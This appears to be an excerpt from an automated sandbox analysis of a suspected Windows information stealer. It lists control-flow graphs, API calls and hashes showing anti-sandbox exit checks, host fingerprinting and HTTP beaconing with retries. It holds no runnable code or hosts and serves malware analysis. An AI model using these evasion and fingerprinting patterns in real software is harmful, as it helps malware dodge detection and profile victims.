                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                        • StrCmpCA.SHLWAPI(?,024D9A00), ref: 00406303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                        • HttpOpenRequestA.WININET(00000000,GET,?,024DDF00,00000000,00000000,00400100,00000000), ref: 00406385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                        • InternetCloseHandle.WININET(00000000), ref: 004064EF
                        • InternetCloseHandle.WININET(00000000), ref: 004064F9
                        • InternetCloseHandle.WININET(00000000), ref: 00406503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3074848878-2509457195
                        • Opcode ID: 3fba3590e5f709bd923487789c072cec83f09d76feea2036fce262c75db160c0
                        • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                        • Opcode Fuzzy Hash: 3fba3590e5f709bd923487789c072cec83f09d76feea2036fce262c75db160c0
                        • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1056 4117a0-4117cd call 41aad0 StrCmpCA 1059 4117d7-4117f1 call 41aad0 strtok_s 1056->1059 1060 4117cf-4117d1 ExitProcess 1056->1060 1063 4117f4-4117f8 1059->1063 1064 4119c2-4119cd call 41a800 1063->1064 1065 4117fe-411811 1063->1065 1067 411817-41181a 1065->1067 1068 41199e-4119bd strtok_s 1065->1068 1070 411821-411830 call 41a820 1067->1070 1071 411849-411858 call 41a820 1067->1071 1072 4118ad-4118be StrCmpCA 1067->1072 1073 4118cf-4118e0 StrCmpCA 1067->1073 1074 41198f-411999 call 41a820 1067->1074 1075 4118f1-411902 StrCmpCA 1067->1075 1076 411951-411962 StrCmpCA 1067->1076 1077 411970-411981 StrCmpCA 1067->1077 1078 411913-411924 StrCmpCA 1067->1078 1079 411932-411943 StrCmpCA 1067->1079 1080 411835-411844 call 41a820 1067->1080 1081 41185d-41186e StrCmpCA 1067->1081 1082 41187f-411890 StrCmpCA 1067->1082 1068->1063 1070->1068 1071->1068 1101 4118c0-4118c3 1072->1101 1102 4118ca 1072->1102 1103 4118e2-4118e5 1073->1103 1104 4118ec 1073->1104 1074->1068 1083 411904-411907 1075->1083 1084 41190e 1075->1084 1089 411964-411967 1076->1089 1090 41196e 1076->1090 1092 411983-411986 1077->1092 1093 41198d 1077->1093 1085 411930 1078->1085 1086 411926-411929 1078->1086 1087 411945-411948 1079->1087 1088 41194f 1079->1088 1080->1068 1097 411870-411873 1081->1097 1098 41187a 1081->1098 1099 411892-41189c 1082->1099 1100 41189e-4118a1 1082->1100 1083->1084 1084->1068 1085->1068 1086->1085 1087->1088 1088->1068 1089->1090 1090->1068 1092->1093 1093->1068 1097->1098 1098->1068 1108 4118a8 1099->1108 1100->1108 1101->1102 1102->1068 1103->1104 1104->1068 1108->1068
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcessstrtok_s
                        • String ID: block
                        • API String ID: 3407564107-2199623458
                        • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                        • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                        • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                        • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1109 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1125 41557c-415583 1109->1125 1126 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1125->1126 1127 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1125->1127 1143 4155bb-4155d2 call 41a8a0 call 41a800 1126->1143 1152 415693-4156a9 call 41aad0 StrCmpCA 1127->1152 1156 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1127->1156 1143->1152 1159 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1152->1159 1160 4156af-4156b6 1152->1160 1156->1152 1289 415ac3-415ac6 1159->1289 1163 4157da-41585f call 41aad0 StrCmpCA 1160->1163 1164 4156bc-4156c3 1160->1164 1183 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1163->1183 1184 415865-41586c 1163->1184 1168 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1164->1168 1169 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1164->1169 1168->1163 1169->1163 1269 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1169->1269 1183->1289 1191 415872-415879 1184->1191 1192 41598f-415a14 call 41aad0 StrCmpCA 1184->1192 1193 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1191->1193 1194 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1191->1194 1222 415a16-415a21 Sleep 1192->1222 1223 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1192->1223 1193->1192 1294 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1193->1294 1194->1192 1222->1125 1223->1289 1269->1163 1294->1192
                        APIs
                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,024A5C80,?,0042110C,?,00000000), ref: 0041A82B
                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                          • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                          • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                          • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                          • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                          • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                          • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                        • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleepstrtok
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3630751533-2791005934
                        • Opcode ID: ae78344d87fb29de376d8aed4e9a1f28d4e38cdf6b96ca29d5bba0b18dc789d6
                        • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                        • Opcode Fuzzy Hash: ae78344d87fb29de376d8aed4e9a1f28d4e38cdf6b96ca29d5bba0b18dc789d6
                        • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1320 417500-41754a GetWindowsDirectoryA 1321 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1320->1321 1322 41754c 1320->1322 1329 4175d8-4175df 1321->1329 1322->1321 1330 4175e1-4175fa call 418d00 1329->1330 1331 4175fc-417617 GetProcessHeap HeapAlloc 1329->1331 1330->1329 1332 417619-417626 call 41a740 1331->1332 1333 417628-417658 wsprintfA call 41a740 1331->1333 1341 41767e-41768e 1332->1341 1333->1341
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                        • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                        • wsprintfA.USER32 ref: 00417640
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\
                        • API String ID: 3790021787-3809124531
                        • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                        • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                        • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                        • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1342 40a003c-40a0047 1343 40a0049 1342->1343 1344 40a004c-40a0263 call 40a0a3f call 40a0e0f call 40a0d90 VirtualAlloc 1342->1344 1343->1344 1359 40a028b-40a0292 1344->1359 1360 40a0265-40a0289 call 40a0a69 1344->1360 1362 40a02a1-40a02b0 1359->1362 1364 40a02ce-40a03c2 VirtualProtect call 40a0cce call 40a0ce7 1360->1364 1362->1364 1365 40a02b2-40a02cc 1362->1365 1371 40a03d1-40a03e0 1364->1371 1365->1362 1372 40a0439-40a04b8 VirtualFree 1371->1372 1373 40a03e2-40a0437 call 40a0ce7 1371->1373 1375 40a04be-40a04cd 1372->1375 1376 40a05f4-40a05fe 1372->1376 1373->1371 1378 40a04d3-40a04dd 1375->1378 1379 40a077f-40a0789 1376->1379 1380 40a0604-40a060d 1376->1380 1378->1376 1384 40a04e3-40a0505 LoadLibraryA 1378->1384 1382 40a078b-40a07a3 1379->1382 1383 40a07a6-40a07b0 1379->1383 1380->1379 1385 40a0613-40a0637 1380->1385 1382->1383 1387 40a086e-40a08be LoadLibraryA 1383->1387 1388 40a07b6-40a07cb 1383->1388 1389 40a0517-40a0520 1384->1389 1390 40a0507-40a0515 1384->1390 1386 40a063e-40a0648 1385->1386 1386->1379 1392 40a064e-40a065a 1386->1392 1398 40a08c7-40a08f9 1387->1398 1393 40a07d2-40a07d5 1388->1393 1391 40a0526-40a0547 1389->1391 1390->1391 1396 40a054d-40a0550 1391->1396 1392->1379 1397 40a0660-40a066a 1392->1397 1394 40a07d7-40a07e0 1393->1394 1395 40a0824-40a0833 1393->1395 1399 40a07e2 1394->1399 1400 40a07e4-40a0822 1394->1400 1404 40a0839-40a083c 1395->1404 1401 40a05e0-40a05ef 1396->1401 1402 40a0556-40a056b 1396->1402 1403 40a067a-40a0689 1397->1403 1405 40a08fb-40a0901 1398->1405 1406 40a0902-40a091d 1398->1406 1399->1395 1400->1393 1401->1378 1407 40a056f-40a057a 1402->1407 1408 40a056d 1402->1408 1409 40a068f-40a06b2 1403->1409 1410 40a0750-40a077a 1403->1410 1404->1387 1411 40a083e-40a0847 1404->1411 1405->1406 1412 40a059b-40a05bb 1407->1412 1413 40a057c-40a0599 1407->1413 1408->1401 1414 40a06ef-40a06fc 1409->1414 1415 40a06b4-40a06ed 1409->1415 1410->1386 1416 40a084b-40a086c 1411->1416 1417 40a0849 1411->1417 1425 40a05bd-40a05db 1412->1425 1413->1425 1419 40a074b 1414->1419 1420 40a06fe-40a0748 1414->1420 1415->1414 1416->1404 1417->1387 1419->1403 1420->1419 1425->1396
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 040A024D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: cess$kernel32.dll
                        • API String ID: 4275171209-1230238691
                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                        • Instruction ID: c4baa1a36c1c88623e039b4033ffd85db8839454ea71c4ae51a53c35e0e006b6
                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                        • Instruction Fuzzy Hash: 2E526B74A01229DFDB64CFA8C984BACBBB1BF09304F1480D9E54DAB351DB30AA95DF15

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,024ACCA8), ref: 004198A1
                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,024ACD08), ref: 004198BA
                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,024ACD20), ref: 004198D2
                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,024ACC90), ref: 004198EA
                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,024D9690), ref: 00419903
                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,024A5C50), ref: 0041991B
                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,024A4510), ref: 00419933
                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,024A42F0), ref: 0041994C
                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,024D9648), ref: 00419964
                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,024D9618), ref: 0041997C
                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,024D9810), ref: 00419995
                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,024D9768), ref: 004199AD
                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,024A42D0), ref: 004199C5
                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,024D9720), ref: 004199DE
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                          • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                          • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                          • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                          • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                          • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                          • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                          • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                          • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                          • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                          • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                        • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                          • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                          • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                          • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                          • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                          • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                          • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                          • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,024A5C80,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                        • Sleep.KERNEL32(00001770), ref: 00416B04
                        • CloseHandle.KERNEL32(?,00000000,?,024A5C80,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                        • ExitProcess.KERNEL32 ref: 00416B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 3511611419-0
                        • Opcode ID: 777e6741428d29f3ac2eda15a5f9635963f388c94dd1b9800fe8626475fd4fd3
                        • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                        • Opcode Fuzzy Hash: 777e6741428d29f3ac2eda15a5f9635963f388c94dd1b9800fe8626475fd4fd3
                        • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                        Control-flow Graph

                        APIs
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                        • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@$CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1683549937-4251816714
                        • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                        • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                        • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                        • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1491 401220-401247 call 4189b0 GlobalMemoryStatusEx 1494 401273-40127a 1491->1494 1495 401249-401271 call 41da00 * 2 1491->1495 1497 401281-401285 1494->1497 1495->1497 1499 401287 1497->1499 1500 40129a-40129d 1497->1500 1502 401292-401294 ExitProcess 1499->1502 1503 401289-401290 1499->1503 1503->1500 1503->1502
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                        • __aulldiv.LIBCMT ref: 00401258
                        • __aulldiv.LIBCMT ref: 00401266
                        • ExitProcess.KERNEL32 ref: 00401294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                        • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                        • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                        • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1505 416af3 1506 416b0a 1505->1506 1508 416aba-416ad7 call 41aad0 OpenEventA 1506->1508 1509 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1506->1509 1514 416af5-416b04 CloseHandle Sleep 1508->1514 1515 416ad9-416af1 call 41aad0 CreateEventA 1508->1515 1514->1506 1515->1509
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,024A5C80,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                        • Sleep.KERNEL32(00001770), ref: 00416B04
                        • CloseHandle.KERNEL32(?,00000000,?,024A5C80,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                        • ExitProcess.KERNEL32 ref: 00416B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                        • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                        • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                        • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                        APIs
